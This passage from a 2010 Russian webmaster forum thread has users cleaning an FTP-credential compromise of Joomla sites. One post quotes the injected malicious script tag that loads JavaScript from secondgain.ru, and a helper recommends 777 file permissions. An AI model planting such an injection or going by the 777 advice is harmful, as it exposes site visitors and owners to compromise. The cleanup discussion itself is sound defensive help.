Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Безопасность

Важная информация
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности.

Ответ
 
Опции темы Оценить тему Опции просмотра
Старый 07.08.2010, 16:00   #16
 
Аватар для jessica
 
Сообщений: 218
FR (активность): 11,279

Доп. информация
По умолчанию Автор темы Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от ligne_pure Посмотреть сообщение

У меня сегодня та же самая фигня
Здравствуйте, Михаил! И как Вы с этим боролись?
jessica вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 16:47   #17
 
Аватар для Umka
 
Сообщений: 4,143
FR (активность): 80,659

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

ligne_pure, jessica, - у меня была такая же бяка, еле избавился, всего было заражено около 500 файлов (!).... Заглушил сайт (иначе Гугл я Яндексом могут начать материться, что "на сайте вирус"), сделал резервную копию, залил на локал, заменил все файлы, относящиеся к ядру джумлы, поменял пароли на ФТП, вручную проверил шаб, компонеты, модули (поиском по тексту - ищем все файлы, где есть определенный фрагмент текста), затем снес все на хостинге (кроме базы, разумеется), залил сайт заново...

Цитата:
Сообщение от jessica Посмотреть сообщение
мне поможет тех.поддержка? Это ведь в их компетенции?
нет.
Цитата:
Сообщение от jessica Посмотреть сообщение
Пытаюсь перезалить файлы по ФТП, открывается окошко "такой файл уже существует" Перезаписать? Жму "OK", а окошко не закрывается!
Пытаюсь закрыть через крестик вверху- не получается!!!
Проверьте права доступа. Поставьте 777.

В аттаче: бэкапалка Akeeba Backup 3.0 Stable. Установить компонент, затем - модуль, затем русик. В настройках установить формат архива - ZIP. Во время создания резервной копии другие окна не открывать, ни на какие страницы не переходить. Сидеть, смотреть на окошко и ждать - иначе ошибку выдать может....

З.Ы. ...у меня есть старый клип DJ Groove "Чаззтье есть (его не могет не быть)"... Вам выложить?
Вложения
Тип файла: zip Akeeba Backup 3_0 Stable.zip (599.3 Кб, 1 просмотров)
Umka вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
jessica (07.08.2010), ligne_pure (07.08.2010)
Старый 07.08.2010, 17:03   #18
 
Аватар для jessica
 
Сообщений: 218
FR (активность): 11,279

Доп. информация
По умолчанию Автор темы Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от umka from ufa Посмотреть сообщение
ligne_pure, jessica, - у меня была такая же бяка, еле избавился, всего было заражено около 500 файлов (!).... Заглушил сайт (иначе Гугл я Яндексом могут начать материться, что "на сайте вирус"), сделал резервную копию, залил на локал, заменил все файлы, относящиеся к ядру джумлы, поменял пароли на ФТП, вручную проверил шаб, компонеты, модули (поиском по тексту - ищем все файлы, где есть определенный фрагмент текста), затем снес все на хостинге (кроме базы, разумеется), залил сайт заново...
Ой, мааама!!!
Цитата:
нет.
А вот помогли, сайтик снова работает!!!
Цитата:
Проверьте права доступа. Поставьте 777.
Так и стоит.
Цитата:
В аттаче: бэкапалка Akeeba Backup 3.0 Stable. Установить компонент, затем - модуль, затем русик. В настройках установить формат архива - ZIP. Во время создания резервной копии другие окна не открывать, ни на какие страницы не переходить. Сидеть, смотреть на окошко и ждать - иначе ошибку выдать может....
А я уже сделала бэкап через хостинг-аккаунт, так ведь тоже можно?

Цитата:
З.Ы. ...у меня есть старый клип DJ Groove "Чаззтье есть (его не могет не быть)"... Вам выложить?
Давайте, для меня это сейчас актуально!
jessica вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 17:14   #19
 
Аватар для Umka
 
Сообщений: 4,143
FR (активность): 80,659

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от jessica Посмотреть сообщение
А вот помогли
Все равно перепроверьте... Никогда не лишнее...
Цитата:
Сообщение от jessica Посмотреть сообщение
А я уже сделала бэкап через хостинг-аккаунт
Конечно, но разница с компонентом существенная - Akeeba делает архив сайта + базы + инсталятор... Он разворачивается за пару минут...

Песенко:
Скрытый (как скрывать?) текст. Только для группы: "Зарегистрированные":
Ваша группа не позволяет просмотреть скрытую информацию.
Umka вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
ligne_pure (07.08.2010)
Старый 07.08.2010, 17:25   #20
 
Аватар для ligne_pure
 
Сообщений: 584
FR (активность): 6,923

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

To jessica:

Ольга, воспользовался советом umk'и from ufa

To umka from ufa:

Факты:
1. Характер скрипта, что у меня, что у jessica - одинаковый, только разные адреса (это не вопрос, это факт)
2. Скрипт прописался в каждый файл index.php "внутренностей сайта". Работы на три дня, понял, занимаюсь.
3. Пароли поменял.

Вопросы:
1. Что ему, этому скрипту надо?
Оффтоп:
(<script type="text/javascript" src="http://secondgain.ru/Web_Page.js"></script>
<!--4680f01ee46df2465ab1a4a67cd49ecf-->)
Ведь, если открыть по этому адресу в браузере - всего лишь пустая страница.
2. У меня на хосте А находится 4 сайта. 2 из них выключены (в работе). Скрипт прописался только в рабочие сайты (оставшиеся 2). Почему ?
3. В фтп попадаю через Тотал Коммандер. Пароли, явки храню там же. Мог ли вирус пройти по этому пути?
4. Если да, то почему тогда он не тронул еще один сайт, расположенный на хостинге Б, однако доступ по фтп вписан в тот же Тотал Коммандер?
5. А так же в ТКоммандере лежит пароль от фтп хостинга jessica, может ли это быть взаимосвязано? (Если да, то почему у нас разные скрипты?)
Оффтоп:
6. Почему у Вас на аватарке позитивный свин , а у меня - угрюмый ?


Дизайн — это не красивая картинка, это решение поставленной задачи.
ligne_pure вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 18:05   #21
 
Аватар для jessica
 
Сообщений: 218
FR (активность): 11,279

Доп. информация
По умолчанию Автор темы Re: SOS!!!Не могу зайти на сайт!

А я свои пароли нигде не хранила, их знали только я и хостер. Но хостер сказал:
"На компьютере, который имеет доступ на ФТП завёлся вирус, который похитил
данные от ФТП и котороый пытался прописать себя в ваши файлы, но испортил
файл, тем самым выдаётся синтаксическая ошибка ПХП.
Но ведь за день до этого было все проверено антивирусом на моем компе!
Сменила пароль.
Интересно, почему Яндекс вэбмастер выдал, что "вредоносный код на сайте не обнаружен", когда он там был?
Т.е., теперь вручную надо проверять все index.php на отсутствие этого злосчастного скрипта? Или вообще все файлы?
jessica вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 18:10   #22
 
Аватар для Umka
 
Сообщений: 4,143
FR (активность): 80,659

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

1. Х/З... Я и сам не понял, каково его предназначение...
2. На 2 сайтах у меня он был, если точно. оба на одном аккаунте. Просто второй был ГС, он типо не в счет (я его снес и не заморачивался).
3-4-5. Да, я тоже ходил через тотал. Пароль на ФТП посоветовали поменять именно хостеры, якобы могли стырить (в принципе сниффер если повесить, то можно, впрочем хакер из меня не ахти, тонкостей не знаю, как там ФТП ломают).
Могли стырить из Тотала наверное (у меня айпи статический)... Кстати у меня еще все права доступа были сброшены на 777....
6. Смайлиег, то бишь улыбочку нужно на аватару пририсовать... У нее (аватары) рта ведь нет, а у моей - есть (потому ей и улыбаться есть чем) Редактируется за 5 минут...
Umka вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 18:11   #23
 
Аватар для ligne_pure
 
Сообщений: 584
FR (активность): 6,923

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от jessica Посмотреть сообщение
Но ведь за день до этого было все проверено антивирусом на моем компе!
Вдруг от меня пришел ? (посмотрим, что скажет umka from ufa)

Цитата:
Сообщение от jessica Посмотреть сообщение
Интересно, почему Яндекс вэбмастер выдал, что "вредоносный код на сайте не обнаружен", когда он там был?
Не успел найти, как вариант.

Цитата:
Сообщение от jessica Посмотреть сообщение

Т.е., теперь вручную надо проверять все index.php на отсутствие этого злосчастного скрипта? Или вообще все файлы?
Я редактирую в данный момент только все index.php и index.html (там в каждом строка этой гадости). После чего прогоню через поиск по тексту все остальные фалы, т.к вручную открывать каждую "крокозябру" - это недели не хватит.


Дизайн — это не красивая картинка, это решение поставленной задачи.
ligne_pure вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 18:12   #24
 
Аватар для Umka
 
Сообщений: 4,143
FR (активность): 80,659

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от jessica Посмотреть сообщение
Или вообще все файлы?
Все. Это не долго. Не вручную же. "Найти все файлы... с текстом..." ИЗ Тотального Коммандера - за пару минут делается...

Добавлено через 3 минуты
Цитата:
Сообщение от umka from ufa Посмотреть сообщение
Я редактирую в данный момент только все index.php и index.html
Зачем??? Из стандартной джумлы проще заменть. В index.html - вообще ничего нет. Это же заглушка. Переписать поверх пакет обновления или вообще всю джумлу, кроме папки installation и configuration.php
Umka вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 18:17   #25
 
Аватар для ligne_pure
 
Сообщений: 584
FR (активность): 6,923

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от umka from ufa Посмотреть сообщение
Все. Это не долго. Не вручную же. "Найти все файлы... с текстом..." ИЗ Тотального Коммандера - за пару минут делается...
Да там, как и у Вас, 500 больных , все равно редактировать не быстро (это ж каждый надо открыть, грохнуть скрипт, сохранить, закрыть )

Оффтоп:
Как Вас зовут, кстати ? Я - Михаил.


Добавлено через 2 минуты
Цитата:
Сообщение от umka from ufa Посмотреть сообщение
Зачем??? Из стандартной джумлы проще заменть. В index.html - вообще ничего нет. Это же заглушка. Переписать поверх пакет обновления или вообще всю джумлу, кроме папки installation и configuration.php
Что я и где пропустил ? ) Сохранил через панель фтп хостера весь сайт на локалку, чтоб не потерять статьи хотя бы (все ведь уник, рожденный, когда легко, а где и с муками)).
После чего закрыл сайт на "временно не работает" и через фтп удаляю все записи скрипта из каждого "поврежденного" файла.

Добавлено через 3 минуты
Цитата:
Сообщение от umka from ufa Посмотреть сообщение
В index.html - вообще ничего нет. Это же заглушка.
А зачем тогда туда эта пакость прописалась ?


Дизайн — это не красивая картинка, это решение поставленной задачи.
ligne_pure вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 18:26   #26
 
Аватар для Umka
 
Сообщений: 4,143
FR (активность): 80,659

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от ligne_pure Посмотреть сообщение
А зачем тогда туда эта пакость прописалась ?
По умолчанию при заходе в каталог Х открывается пустая страница (потому и индекс пустой), так - будет открываться нечто...

Цитата:
Сообщение от ligne_pure Посмотреть сообщение
Что я и где пропустил
Сохранили на локал - перепишите чистой джумлой поверх. Прямо последний релиз взять и преписать, заменив всё... Тогда останется больных файлов впятеро меньше...
Оффтоп:
Алексей...
З.Ы. ...кагбэ удачи - пошел я с собакой гулять!
Umka вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 18:28   #27
 
Аватар для ligne_pure
 
Сообщений: 584
FR (активность): 6,923

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от umka from ufa Посмотреть сообщение
По умолчанию при заходе в каталог Х открывается пустая страница (потому и индекс пустой), так - будет открываться нечто...
Ничего не понял

Добавлено через 2 минуты
Цитата:
Сообщение от umka from ufa Посмотреть сообщение
Сохранили на локал - перепишите чистой джумлой поверх. Прямо последний релиз взять и преписать, заменив всё... Тогда останется больных файлов впятеро меньше...
А как же написанные статьи ? Никуда не денутся ?


Дизайн — это не красивая картинка, это решение поставленной задачи.
ligne_pure вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.08.2010, 19:45   #28
 
Аватар для Umka
 
Сообщений: 4,143
FR (активность): 80,659

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

сайт.ru/images/index.html - если в этом файле что-то будет, то можно получить содержимое каталога (все, что в папке с картинками) и будет нечто, показываемое юзеру. По умолчанию в index.html - ничего нет. Это заглушка. Открывается пустой белый лист.
Цитата:
Сообщение от ligne_pure Посмотреть сообщение
А как же написанные статьи ? Никуда не денутся ?
Они в базе. В скуле. В каталогах: сама джумла, файлы сторонних компонент и плагинов, картинки, шаблон. То есть основу джумлы можно переписывать "поверх" без особой боязни. Это, ну типо как обновление виндуз: система обновится, а файлы юзера в папке "мои документы" останутся...
Более того, какие именно компоненты установлены - тоже хранится в базе. Поэтому файлы компонентов, плагинов и пр. - можно также переписывать без особой боязни.

Содержимое хранится в следующих таблицах:
jos_banner - баннеры
jos_bannerclient - клиенты баннеров
jos_categories - категории материалов
jos_components - список установленных компонентов
jos_contact_details - детали контактов юзеров
jos_content - статьи!
jos_content_frontpage - материалы на главной
jos_groups - группы
jos_menu - пункты меню
jos_menu_types - типы меню
jos_modules - список установленных модулей
jos_modules_menu - меню модулей (раскладка)
jos_poll_data - данные голосований
jos_sections - категории материалов
jos_session - сессии пользователей
jos_users - пользователи и пароли

Вот эти таблицы трогать нельзя. Файлы можно (но осторожно) - переписывать....

З.Ы. Таблиц - больше. Компоненты и плагины могут добавлять свои. В них - настройки этих компонентов. Здесь только стандартные таблицы, и только основные.
Umka вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
ligne_pure (08.08.2010)
Старый 08.08.2010, 11:22   #29
 
Аватар для jessica
 
Сообщений: 218
FR (активность): 11,279

Доп. информация
По умолчанию Автор темы Re: SOS!!!Не могу зайти на сайт!

А если я обновилась до последней версии, теперь не нужно проверять все файлы на наличие этой гадости? Они ведь перезаписались...?
Поменяла пароль от ФТП, админки хостера, установила парольный доступ к файлам корневой папки, сделала бэкап.
Ничего я не упустила, чтобы в будущем обезопасить свой сайтик от "неприятных сюрпризов"? Этого достаточно?

Добавлено через 7 минут
Что-то я не совсем поняла: после установки пароля на папку public_html при каждом заходе на сайт запрашивается пароль и имя пользователя.
Это только у меня так или у Вас тоже?
Посмотрите, плиииз!

Добавлено через 36 минут
Не ту папку запаролировала
Надо administrator.
jessica вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 08.08.2010, 12:04   #30
 
Аватар для Umka
 
Сообщений: 4,143
FR (активность): 80,659

Доп. информация
По умолчанию Re: SOS!!!Не могу зайти на сайт!

Цитата:
Сообщение от jessica Посмотреть сообщение
установила парольный доступ к файлам корневой папки
Это не надо
Цитата:
Сообщение от jessica Посмотреть сообщение
пароля на папку public_html
Это тоже

...иначе будет пароль спрашивать ...у всех

Надо поставить права доступа 755 на папки, 644 - на файлы.
Кроме tmp, cache, log - на них полный доступ 777
Umka вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
jessica (08.08.2010)
Ответ

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 4300 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Текущее время: 17:03. Часовой пояс GMT +3.